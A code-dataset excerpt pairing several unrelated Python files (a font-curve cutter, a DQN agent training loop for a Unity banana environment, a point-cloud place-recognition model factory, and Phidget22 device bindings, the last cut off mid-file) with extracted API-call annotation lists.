"scheduler.factories.CourseFactory.create",
"random.randint"
] | [((388, 402), 'random.seed', 'random.seed', (['(0)'], {}), '(0)\n', (399, 402), False, 'import random\n'), ((3184, 3211), 'scheduler.factories.UserFactory.create_batch', 'UserFactory.create_batch', (['n'], {}), '(n)\n', (3208, 3211), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\n'), ((3378, 3467), 'scheduler.factories.ProfileFactory.create', 'ProfileFactory.create', ([], {'user': 'user', 'course': 'course', 'leader': 'None', 'section': 'None', 'role': 'role'}), '(user=user, course=course, leader=None, section=None,\n role=role)\n', (3399, 3467), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\n'), ((3600, 3658), 'scheduler.factories.SectionFactory.create', 'SectionFactory.create', ([], {'course': 'mentor.course', 'mentor': 'mentor'}), '(course=mentor.course, mentor=mentor)\n', (3621, 3658), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\n'), ((4002, 4033), 'scheduler.factories.create_attendances_for', 'create_attendances_for', (['student'], {}), '(student)\n', (4024, 4033), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\n'), ((821, 832), 'rest_framework.test.APIClient', 'APIClient', ([], {}), '()\n', (830, 832), False, 'from rest_framework.test import APIClient\n'), ((3027, 3058), 'scheduler.factories.CourseFactory.create', 'CourseFactory.create', ([], {'name': 'name'}), '(name=name)\n', (3047, 3058), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\n'), ((2905, 2923), 'random.choice', 'random.choice', (['src'], {}), '(src)\n', (2918, 2923), False, 'import random\n'), ((5211, 5231), 'random.randint', 'random.randint', (['(3)', '(6)'], {}), '(3, 6)\n', (5225, 5231), False, 'import random\n'), ((5506, 5526), 'random.randint', 'random.randint', (['(3)', '(6)'], {}), '(3, 6)\n', (5520, 5526), False, 'import random\n')] |
import math
from fontTools.pens.recordingPen import RecordingPen, replayRecording
from fontTools.misc.bezierTools import calcCubicArcLength, splitCubicAtT
from coldtype.geometry import Rect, Point
def raise_quadratic(start, a, b):
c0 = start
c1 = (c0[0] + (2/3)*(a[0] - c0[0]), c0[1] + (2/3)*(a[1] - c0[1]))
c2 = (b[0] + (2/3)*(a[0] - b[0]), b[1] + (2/3)*(a[1] - b[1]))
c3 = (b[0], b[1])
return [c1, c2, c3]
__length_cache = {}
__split_cache = {}
def splitCubicAtT_cached(a, b, c, d, t):
global __split_cache
abcdt = (a, b, c, d, t)
sc = __split_cache.get(abcdt)
if sc:
return sc
else:
s = splitCubicAtT(a, b, c, d, t)
__split_cache[abcdt] = s
return s
def calcCubicArcLength_cached(a, b, c, d):
#return calcCubicArcLength(a, b, c, d)
global __length_cache
abcd = (a, b, c, d)
lc = __length_cache.get(abcd)
if lc:
return lc
else:
l = calcCubicArcLength(a, b, c, d)
__length_cache[abcd] = l
return l
class CurveCutter():
def __init__(self, g, inc=0.0015):
if isinstance(g, RecordingPen):
self.pen = g
else:
self.pen = RecordingPen()
g.draw(self.pen)
self.inc = inc
self.length = self.calcCurveLength()
def calcCurveLength(self):
length = 0
for i, (t, pts) in enumerate(self.pen.value):
if t == "curveTo":
p1, p2, p3 = pts
p0 = self.pen.value[i-1][-1][-1]
length += calcCubicArcLength_cached(p0, p1, p2, p3)
elif t == "lineTo":
pass # todo
return length
def subsegment(self, start=None, end=None):
global __cut_cache
inc = self.inc
length = self.length
ended = False
_length = 0
out = []
for i, (t, pts) in enumerate(self.pen.value):
if t == "curveTo":
p1, p2, p3 = pts
p0 = self.pen.value[i-1][-1][-1]
length_arc = calcCubicArcLength_cached(p0, p1, p2, p3)
if _length + length_arc < end:
_length += length_arc
else:
t = inc
tries = 0
while not ended:
a, b = splitCubicAtT_cached(p0, p1, p2, p3, t)
length_a = calcCubicArcLength_cached(*a)
if _length + length_a > end:
ended = True
out.append(("curveTo", a[1:]))
else:
t += inc
tries += 1
if t == "lineTo":
pass # TODO
if not ended:
out.append((t, pts))
if out[-1][0] != "endPath":
out.append(("endPath",[]))
return out
def subsegmentPoint(self, start=0, end=1):
inc = self.inc
subsegment = self.subsegment(start=start, end=end)
try:
t, (a, b, c) = subsegment[-2]
tangent = math.degrees(math.atan2(c[1] - b[1], c[0] - b[0]) + math.pi*.5)
return c, tangent
except ValueError:
return None, None | [
"fontTools.misc.bezierTools.splitCubicAtT",
"fontTools.pens.recordingPen.RecordingPen",
"math.atan2",
"fontTools.misc.bezierTools.calcCubicArcLength"
] | [((650, 678), 'fontTools.misc.bezierTools.splitCubicAtT', 'splitCubicAtT', (['a', 'b', 'c', 'd', 't'], {}), '(a, b, c, d, t)\n', (663, 678), False, 'from fontTools.misc.bezierTools import calcCubicArcLength, splitCubicAtT\n'), ((951, 981), 'fontTools.misc.bezierTools.calcCubicArcLength', 'calcCubicArcLength', (['a', 'b', 'c', 'd'], {}), '(a, b, c, d)\n', (969, 981), False, 'from fontTools.misc.bezierTools import calcCubicArcLength, splitCubicAtT\n'), ((1195, 1209), 'fontTools.pens.recordingPen.RecordingPen', 'RecordingPen', ([], {}), '()\n', (1207, 1209), False, 'from fontTools.pens.recordingPen import RecordingPen, replayRecording\n'), ((3145, 3181), 'math.atan2', 'math.atan2', (['(c[1] - b[1])', '(c[0] - b[0])'], {}), '(c[1] - b[1], c[0] - b[0])\n', (3155, 3181), False, 'import math\n')] |
"""
Project for Udacity Danaodgree in Deep Reinforcement Learning
This script train an agent to navigate (and collect bananas!) in a large, square world.
A reward of +1 is provided for collecting a yellow banana, and a reward of -1 is provided for collecting a blue banana. Thus, the goal of your agent is to collect as many yellow bananas as possible while avoiding blue bananas.
The state space has 37 dimensions and contains the agent's velocity, along with ray-based perception of objects around the agent's forward direction. Given this information, the agent has to learn how to best select actions. Four discrete actions are available, corresponding to:
0 - move forward.
1 - move backward.
2 - turn left.
3 - turn right.
The task is episodic, and in order to solve the environment, your agent must get an average score of +13 over 100 consecutive episodes.
"""
from unityagents import UnityEnvironment
import numpy as np
from collections import deque
from dqn_agent import Agent
import torch
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
"""
Unity environment configuration
Mac: "path/to/Banana.app"
Windows (x86): "path/to/Banana_Windows_x86/Banana.exe"
Windows (x86_64): "path/to/Banana_Windows_x86_64/Banana.exe"
Linux (x86): "path/to/Banana_Linux/Banana.x86"
Linux (x86_64): "path/to/Banana_Linux/Banana.x86_64"
Linux (x86, headless): "path/to/Banana_Linux_NoVis/Banana.x86"
Linux (x86_64, headless): "path/to/Banana_Linux_NoVis/Banana.x86_64"
"""
# start Unity environment
env = UnityEnvironment(file_name="Banana.app")
# get the default brain
brain_name = env.brain_names[0]
brain = env.brains[brain_name]
env_info = env.reset(train_mode=False)[brain_name]
action_size = brain.vector_action_space_size
state_size = len(env_info.vector_observations[0])
# initialize agent
agent = Agent(state_size=state_size, action_size=action_size, seed=0, device=device)
def train(n_episodes=2000, eps_start=1.0, eps_end=0.05, eps_decay=0.99):
"""Deep Q-Learning.
Params
======
n_episodes (int): maximum number of training episodes
eps_start (float): starting value of epsilon, for epsilon-greedy action selection
eps_end (float): minimum value of epsilon
eps_decay (float): multiplicative factor (per episode) for decreasing epsilon
"""
scores = [] # list containing scores from each episode
scores_window = deque(maxlen=100) # last 100 scores
eps = eps_start # initialize epsilon
for i_episode in range(1, n_episodes+1):
# reset environment
env_info = env.reset(train_mode=True)[brain_name]
# get initial state
state = env_info.vector_observations[0]
# set initial score
score = 0
while True:
action = agent.act(state, eps)
env_info = env.step(action)[brain_name]
next_state, reward, done = env_info.vector_observations[0], env_info.rewards[0], env_info.local_done[0]
agent.step(state, action, reward, next_state, done)
state = next_state
score += reward
if done:
break
scores_window.append(score) # save most recent score
scores.append(score) # save most recent score
eps = max(eps_end, eps_decay*eps) # decrease epsilon
print('\rEpisode {}\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)), end="")
if i_episode % 100 == 0:
print('\rEpisode {}\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)))
if np.mean(scores_window)>=14:
print('\nEnvironment solved in {:d} episodes!\tAverage Score: {:.2f}'.format(i_episode-100, np.mean(scores_window)))
torch.save(agent.qnetwork_local.state_dict(), 'checkpoint.pth')
break
return scores
train() | [
"numpy.mean",
"collections.deque",
"dqn_agent.Agent",
"unityagents.UnityEnvironment",
"torch.cuda.is_available"
] | [((1524, 1564), 'unityagents.UnityEnvironment', 'UnityEnvironment', ([], {'file_name': '"""Banana.app"""'}), "(file_name='Banana.app')\n", (1540, 1564), False, 'from unityagents import UnityEnvironment\n'), ((1829, 1905), 'dqn_agent.Agent', 'Agent', ([], {'state_size': 'state_size', 'action_size': 'action_size', 'seed': '(0)', 'device': 'device'}), '(state_size=state_size, action_size=action_size, seed=0, device=device)\n', (1834, 1905), False, 'from dqn_agent import Agent\n'), ((2429, 2446), 'collections.deque', 'deque', ([], {'maxlen': '(100)'}), '(maxlen=100)\n', (2434, 2446), False, 'from collections import deque\n'), ((1038, 1063), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1061, 1063), False, 'import torch\n'), ((3653, 3675), 'numpy.mean', 'np.mean', (['scores_window'], {}), '(scores_window)\n', (3660, 3675), True, 'import numpy as np\n'), ((3477, 3499), 'numpy.mean', 'np.mean', (['scores_window'], {}), '(scores_window)\n', (3484, 3499), True, 'import numpy as np\n'), ((3617, 3639), 'numpy.mean', 'np.mean', (['scores_window'], {}), '(scores_window)\n', (3624, 3639), True, 'import numpy as np\n'), ((3785, 3807), 'numpy.mean', 'np.mean', (['scores_window'], {}), '(scores_window)\n', (3792, 3807), True, 'import numpy as np\n')] |
# Warsaw University of Technology
from layers.eca_block import ECABasicBlock
from models.minkgl import MinkHead, MinkTrunk, MinkGL
from models.minkloc import MinkLoc
from third_party.minkloc3d.minkloc import MinkLoc3D
from misc.utils import ModelParams
def model_factory(model_params: ModelParams):
in_channels = 1
if model_params.model == 'MinkLoc':
model = MinkLoc(in_channels=in_channels, feature_size=model_params.feature_size,
output_dim=model_params.output_dim, planes=model_params.planes,
layers=model_params.layers, num_top_down=model_params.num_top_down,
conv0_kernel_size=model_params.conv0_kernel_size, block=model_params.block,
pooling_method=model_params.pooling)
elif model_params.model == 'MinkLoc3D':
model = MinkLoc3D()
elif 'egonn' in model_params.model:
model = create_egonn_model(model_params)
else:
raise NotImplementedError('Model not implemented: {}'.format(model_params.model))
return model
def create_egonn_model(model_params: ModelParams):
model_name = model_params.model
global_normalize = False
local_normalize = True
if model_name == 'egonn':
# THIS IS OUR BEST MODEL
block = ECABasicBlock
planes = [32, 64, 64, 128, 128, 128, 128]
layers = [1, 1, 1, 1, 1, 1, 1]
global_in_levels = [5, 6, 7]
global_map_channels = 128
global_descriptor_size = 256
local_in_levels = [3, 4]
local_map_channels = 64
local_descriptor_size = 128
else:
raise NotImplementedError(f'Unknown model: {model_name}')
# Planes list number of channels for level 1 and above
global_in_channels = [planes[i-1] for i in global_in_levels]
head_global = MinkHead(global_in_levels, global_in_channels, global_map_channels)
if len(local_in_levels) > 0:
local_in_channels = [planes[i-1] for i in local_in_levels]
head_local = MinkHead(local_in_levels, local_in_channels, local_map_channels)
else:
head_local = None
min_out_level = len(planes)
if len(global_in_levels) > 0:
min_out_level = min(min_out_level, min(global_in_levels))
if len(local_in_levels) > 0:
min_out_level = min(min_out_level, min(local_in_levels))
trunk = MinkTrunk(in_channels=1, planes=planes, layers=layers, conv0_kernel_size=5, block=block,
min_out_level=min_out_level)
net = MinkGL(trunk, local_head=head_local, local_descriptor_size=local_descriptor_size,
local_normalize=local_normalize, global_head=head_global,
global_descriptor_size=global_descriptor_size, global_pool_method='GeM',
global_normalize=global_normalize, quantizer=model_params.quantizer)
return net | [
"models.minkgl.MinkHead",
"models.minkgl.MinkGL",
"models.minkloc.MinkLoc",
"models.minkgl.MinkTrunk",
"third_party.minkloc3d.minkloc.MinkLoc3D"
] | [((1835, 1902), 'models.minkgl.MinkHead', 'MinkHead', (['global_in_levels', 'global_in_channels', 'global_map_channels'], {}), '(global_in_levels, global_in_channels, global_map_channels)\n', (1843, 1902), False, 'from models.minkgl import MinkHead, MinkTrunk, MinkGL\n'), ((2370, 2491), 'models.minkgl.MinkTrunk', 'MinkTrunk', ([], {'in_channels': '(1)', 'planes': 'planes', 'layers': 'layers', 'conv0_kernel_size': '(5)', 'block': 'block', 'min_out_level': 'min_out_level'}), '(in_channels=1, planes=planes, layers=layers, conv0_kernel_size=5,\n block=block, min_out_level=min_out_level)\n', (2379, 2491), False, 'from models.minkgl import MinkHead, MinkTrunk, MinkGL\n'), ((2521, 2821), 'models.minkgl.MinkGL', 'MinkGL', (['trunk'], {'local_head': 'head_local', 'local_descriptor_size': 'local_descriptor_size', 'local_normalize': 'local_normalize', 'global_head': 'head_global', 'global_descriptor_size': 'global_descriptor_size', 'global_pool_method': '"""GeM"""', 'global_normalize': 'global_normalize', 'quantizer': 'model_params.quantizer'}), "(trunk, local_head=head_local, local_descriptor_size=\n local_descriptor_size, local_normalize=local_normalize, global_head=\n head_global, global_descriptor_size=global_descriptor_size,\n global_pool_method='GeM', global_normalize=global_normalize, quantizer=\n model_params.quantizer)\n", (2527, 2821), False, 'from models.minkgl import MinkHead, MinkTrunk, MinkGL\n'), ((381, 716), 'models.minkloc.MinkLoc', 'MinkLoc', ([], {'in_channels': 'in_channels', 'feature_size': 'model_params.feature_size', 'output_dim': 'model_params.output_dim', 'planes': 'model_params.planes', 'layers': 'model_params.layers', 'num_top_down': 'model_params.num_top_down', 'conv0_kernel_size': 'model_params.conv0_kernel_size', 'block': 'model_params.block', 'pooling_method': 'model_params.pooling'}), '(in_channels=in_channels, feature_size=model_params.feature_size,\n output_dim=model_params.output_dim, planes=model_params.planes, layers=\n model_params.layers, num_top_down=model_params.num_top_down,\n conv0_kernel_size=model_params.conv0_kernel_size, block=model_params.\n block, pooling_method=model_params.pooling)\n', (388, 716), False, 'from models.minkloc import MinkLoc\n'), ((2025, 2089), 'models.minkgl.MinkHead', 'MinkHead', (['local_in_levels', 'local_in_channels', 'local_map_channels'], {}), '(local_in_levels, local_in_channels, local_map_channels)\n', (2033, 2089), False, 'from models.minkgl import MinkHead, MinkTrunk, MinkGL\n'), ((856, 867), 'third_party.minkloc3d.minkloc.MinkLoc3D', 'MinkLoc3D', ([], {}), '()\n', (865, 867), False, 'from third_party.minkloc3d.minkloc import MinkLoc3D\n')] |
import sys
import ctypes
from Phidget22.PhidgetSupport import PhidgetSupport
from Phidget22.Async import *
from Phidget22.ChannelClass import ChannelClass
from Phidget22.ChannelSubclass import ChannelSubclass
from Phidget22.DeviceClass import DeviceClass
from Phidget22.DeviceID import DeviceID
from Phidget22.ErrorEventCode import ErrorEventCode
from Phidget22.PhidgetException import PhidgetException
class Phidget:
def __init__(self):
self.handle = ctypes.c_void_p()
if sys.platform == 'win32':
self._AttachFactory = ctypes.WINFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p)
else:
self._AttachFactory = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p)
self._Attach = None
self._onAttach = None
if sys.platform == 'win32':
self._DetachFactory = ctypes.WINFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p)
else:
self._DetachFactory = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p)
self._Detach = None
self._onDetach = None
if sys.platform == 'win32':
self._ErrorFactory = ctypes.WINFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int, ctypes.c_char_p)
else:
self._ErrorFactory = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int, ctypes.c_char_p)
self._Error = None
self._onError = None
if sys.platform == 'win32':
self._PropertyChangeFactory = ctypes.WINFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_char_p)
else:
self._PropertyChangeFactory = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_char_p)
self._PropertyChange = None
self._onPropertyChange = None
def __eq__(self, other):
return hasattr(other, 'handle') and self.handle.value == other.handle.value
def __hash__(self):
return self.handle.value
def __str__(self):
_value = (ctypes.c_char * 65536)()
_valueLen = ctypes.c_int32(65536)
if self.getIsChannel():
__func = PhidgetSupport.getDll().channelInfo
else:
__func = PhidgetSupport.getDll().deviceInfo
result = __func(self.handle, ctypes.byref(_value), _valueLen)
return _value.value.decode('utf- 8')
def __del__(self):
__func = PhidgetSupport.getDll().Phidget_delete
__func.restype = ctypes.c_int32
res = __func(ctypes.byref(self.handle))
self.handle = None
if res > 0:
raise PhidgetException(res)
def _localAttachEvent(self, handle, userPtr):
if self._Attach == None:
return
self._Attach(self)
def setOnAttachHandler(self, handler):
if handler == None:
self._Attach = None
self._onAttach = None
else:
self._Attach = handler
self._onAttach = self._AttachFactory(self._localAttachEvent)
try:
__func = PhidgetSupport.getDll().Phidget_setOnAttachHandler
__func.restype = ctypes.c_int32
res = __func(self.handle, self._onAttach, None)
except RuntimeError:
self._Attach = None
self._onAttach = None
def _localDetachEvent(self, handle, userPtr):
if self._Detach == None:
return
self._Detach(self)
def setOnDetachHandler(self, handler):
if handler == None:
self._Detach = None
self._onDetach = None
else:
self._Detach = handler
self._onDetach = self._DetachFactory(self._localDetachEvent)
try:
__func = PhidgetSupport.getDll().Phidget_setOnDetachHandler
__func.restype = ctypes.c_int32
res = __func(self.handle, self._onDetach, None)
except RuntimeError:
self._Detach = None
self._onDetach = None
def _localErrorEvent(self, handle, userPtr, Code, Description):
if self._Error == None:
return
Description = Description.decode('utf-8')
self._Error(self, Code, Description)
def setOnErrorHandler(self, handler):
if handler == None:
self._Error = None
self._onError = None
else:
self._Error = handler
self._onError = self._ErrorFactory(self._localErrorEvent)
try:
__func = PhidgetSupport.getDll().Phidget_setOnErrorHandler
__func.restype = ctypes.c_int32
res = __func(self.handle, self._onError, None)
except RuntimeError:
self._Error = None
self._onError = None
def _localPropertyChangeEvent(self, handle, userPtr, propertyName):
if self._PropertyChange == None:
return
propertyName = propertyName.decode('utf-8')
self._PropertyChange(self, propertyName)
def setOnPropertyChangeHandler(self, handler):
if handler == None:
self._PropertyChange = None
self._onPropertyChange = None
else:
self._PropertyChange = handler
self._onPropertyChange = self._PropertyChangeFactory(self._localPropertyChangeEvent)
try:
__func = PhidgetSupport.getDll().Phidget_setOnPropertyChangeHandler
__func.restype = ctypes.c_int32
res = __func(self.handle, self._onPropertyChange, None)
except RuntimeError:
self._PropertyChange = None
self._onPropertyChange = None
@staticmethod
def finalize(flags):
_flags = ctypes.c_int32(flags)
__func = PhidgetSupport.getDll().Phidget_finalize
__func.restype = ctypes.c_int32
result = __func(_flags)
if result > 0:
raise PhidgetException(result)
@staticmethod
def getLibraryVersion():
_LibraryVersion = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getLibraryVersion
__func.restype = ctypes.c_int32
result = __func(ctypes.byref(_LibraryVersion))
if result > 0:
raise PhidgetException(result)
return _LibraryVersion.value.decode('utf-8')
@staticmethod
def getLibraryVersionNumber():
_LibraryVersionNumber = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getLibraryVersionNumber
__func.restype = ctypes.c_int32
result = __func(ctypes.byref(_LibraryVersionNumber))
if result > 0:
raise PhidgetException(result)
return _LibraryVersionNumber.value.decode('utf-8')
@staticmethod
def resetLibrary():
__func = PhidgetSupport.getDll().Phidget_resetLibrary
__func.restype = ctypes.c_int32
result = __func()
if result > 0:
raise PhidgetException(result)
def getAttached(self):
_Attached = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getAttached
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_Attached))
if result > 0:
raise PhidgetException(result)
return _Attached.value
def getChannel(self):
_Channel = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getChannel
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_Channel))
if result > 0:
raise PhidgetException(result)
return _Channel.value
def setChannel(self, Channel):
_Channel = ctypes.c_int(Channel)
__func = PhidgetSupport.getDll().Phidget_setChannel
__func.restype = ctypes.c_int32
result = __func(self.handle, _Channel)
if result > 0:
raise PhidgetException(result)
def getChannelClass(self):
_ChannelClass = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getChannelClass
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_ChannelClass))
if result > 0:
raise PhidgetException(result)
return _ChannelClass.value
def getChannelClassName(self):
_ChannelClassName = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getChannelClassName
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_ChannelClassName))
if result > 0:
raise PhidgetException(result)
return _ChannelClassName.value.decode('utf-8')
def getChannelName(self):
_ChannelName = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getChannelName
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_ChannelName))
if result > 0:
raise PhidgetException(result)
return _ChannelName.value.decode('utf-8')
def getChannelSubclass(self):
_ChannelSubclass = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getChannelSubclass
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_ChannelSubclass))
if result > 0:
raise PhidgetException(result)
return _ChannelSubclass.value
def close(self):
__func = PhidgetSupport.getDll().Phidget_close
__func.restype = ctypes.c_int32
result = __func(self.handle)
if result > 0:
raise PhidgetException(result)
def getDeviceChannelCount(self, cls):
_cls = ctypes.c_int(cls)
_count = ctypes.c_uint32()
__func = PhidgetSupport.getDll().Phidget_getDeviceChannelCount
__func.restype = ctypes.c_int32
result = __func(self.handle, _cls, ctypes.byref(_count))
if result > 0:
raise PhidgetException(result)
return _count.value
def getDeviceClass(self):
_DeviceClass = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getDeviceClass
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_DeviceClass))
if result > 0:
raise PhidgetException(result)
return _DeviceClass.value
def getDeviceClassName(self):
_DeviceClassName = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getDeviceClassName
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_DeviceClassName))
if result > 0:
raise PhidgetException(result)
return _DeviceClassName.value.decode('utf-8')
def getDeviceID(self):
_DeviceID = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getDeviceID
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_DeviceID))
if result > 0:
raise PhidgetException(result)
return _DeviceID.value
def getDeviceLabel(self):
_DeviceLabel = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getDeviceLabel
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_DeviceLabel))
if result > 0:
raise PhidgetException(result)
return _DeviceLabel.value.decode('utf-8')
def setDeviceLabel(self, DeviceLabel):
_DeviceLabel = ctypes.create_string_buffer(DeviceLabel.encode('utf-8'))
__func = PhidgetSupport.getDll().Phidget_setDeviceLabel
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_DeviceLabel))
if result > 0:
raise PhidgetException(result)
def getDeviceName(self):
_DeviceName = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getDeviceName
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_DeviceName))
if result > 0:
raise PhidgetException(result)
return _DeviceName.value.decode('utf-8')
def getDeviceSerialNumber(self):
_DeviceSerialNumber = ctypes.c_int32()
__func = PhidgetSupport.getDll().Phidget_getDeviceSerialNumber
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_DeviceSerialNumber))
if result > 0:
raise PhidgetException(result)
return _DeviceSerialNumber.value
def setDeviceSerialNumber(self, DeviceSerialNumber):
_DeviceSerialNumber = ctypes.c_int32(DeviceSerialNumber)
__func = PhidgetSupport.getDll().Phidget_setDeviceSerialNumber
__func.restype = ctypes.c_int32
result = __func(self.handle, _DeviceSerialNumber)
if result > 0:
raise PhidgetException(result)
def getDeviceSKU(self):
_DeviceSKU = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getDeviceSKU
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_DeviceSKU))
if result > 0:
raise PhidgetException(result)
return _DeviceSKU.value.decode('utf-8')
def getDeviceVersion(self):
_DeviceVersion = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getDeviceVersion
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_DeviceVersion))
if result > 0:
raise PhidgetException(result)
return _DeviceVersion.value
def getHub(self):
_Hub = ctypes.c_void_p()
__func = PhidgetSupport.getDll().Phidget_getHub
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_Hub))
if result > 0:
raise PhidgetException(result)
__Hub = Phidget()
__Hub.handle = _Hub
return __Hub
def getHubPort(self):
_HubPort = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getHubPort
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_HubPort))
if result > 0:
raise PhidgetException(result)
return _HubPort.value
def setHubPort(self, HubPort):
_HubPort = ctypes.c_int(HubPort)
__func = PhidgetSupport.getDll().Phidget_setHubPort
__func.restype = ctypes.c_int32
result = __func(self.handle, _HubPort)
if result > 0:
raise PhidgetException(result)
def getHubPortCount(self):
_HubPortCount = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getHubPortCount
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_HubPortCount))
if result > 0:
raise PhidgetException(result)
return _HubPortCount.value
def getHubPortSpeed(self):
_HubPortSpeed = ctypes.c_uint32()
__func = PhidgetSupport.getDll().Phidget_getHubPortSpeed
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_HubPortSpeed))
if result > 0:
raise PhidgetException(result)
return _HubPortSpeed.value
def setHubPortSpeed(self, HubPortSpeed):
_HubPortSpeed = ctypes.c_uint32(HubPortSpeed)
__func = PhidgetSupport.getDll().Phidget_setHubPortSpeed
__func.restype = ctypes.c_int32
result = __func(self.handle, _HubPortSpeed)
if result > 0:
raise PhidgetException(result)
def getMaxHubPortSpeed(self):
_MaxHubPortSpeed = ctypes.c_uint32()
__func = PhidgetSupport.getDll().Phidget_getMaxHubPortSpeed
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_MaxHubPortSpeed))
if result > 0:
raise PhidgetException(result)
return _MaxHubPortSpeed.value
def getHubPortSupportsSetSpeed(self):
_HubPortSupportsSetSpeed = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getHubPortSupportsSetSpeed
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_HubPortSupportsSetSpeed))
if result > 0:
raise PhidgetException(result)
return _HubPortSupportsSetSpeed.value
def getIsChannel(self):
_IsChannel = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getIsChannel
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_IsChannel))
if result > 0:
raise PhidgetException(result)
return _IsChannel.value
def getIsHubPortDevice(self):
_IsHubPortDevice = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getIsHubPortDevice
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_IsHubPortDevice))
if result > 0:
raise PhidgetException(result)
return _IsHubPortDevice.value
def setIsHubPortDevice(self, IsHubPortDevice):
_IsHubPortDevice = ctypes.c_int(IsHubPortDevice)
__func = PhidgetSupport.getDll().Phidget_setIsHubPortDevice
__func.restype = ctypes.c_int32
result = __func(self.handle, _IsHubPortDevice)
if result > 0:
raise PhidgetException(result)
def getIsLocal(self):
_IsLocal = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getIsLocal
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_IsLocal))
if result > 0:
raise PhidgetException(result)
return _IsLocal.value
def setIsLocal(self, IsLocal):
_IsLocal = ctypes.c_int(IsLocal)
__func = PhidgetSupport.getDll().Phidget_setIsLocal
__func.restype = ctypes.c_int32
result = __func(self.handle, _IsLocal)
if result > 0:
raise PhidgetException(result)
def getIsRemote(self):
_IsRemote = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getIsRemote
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_IsRemote))
if result > 0:
raise PhidgetException(result)
return _IsRemote.value
def setIsRemote(self, IsRemote):
_IsRemote = ctypes.c_int(IsRemote)
__func = PhidgetSupport.getDll().Phidget_setIsRemote
__func.restype = ctypes.c_int32
result = __func(self.handle, _IsRemote)
if result > 0:
raise PhidgetException(result)
def open(self):
__func = PhidgetSupport.getDll().Phidget_open
__func.restype = ctypes.c_int32
result = __func(self.handle)
if result > 0:
raise PhidgetException(result)
def openWaitForAttachment(self, timeout):
_timeout = ctypes.c_uint32(timeout)
__func = PhidgetSupport.getDll().Phidget_openWaitForAttachment
__func.restype = ctypes.c_int32
result = __func(self.handle, _timeout)
if result > 0:
raise PhidgetException(result)
def getParent(self):
_Parent = ctypes.c_void_p()
__func = PhidgetSupport.getDll().Phidget_getParent
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_Parent))
if result > 0:
raise PhidgetException(result)
__Parent = Phidget()
__Parent.handle = _Parent
return __Parent
def getServerHostname(self):
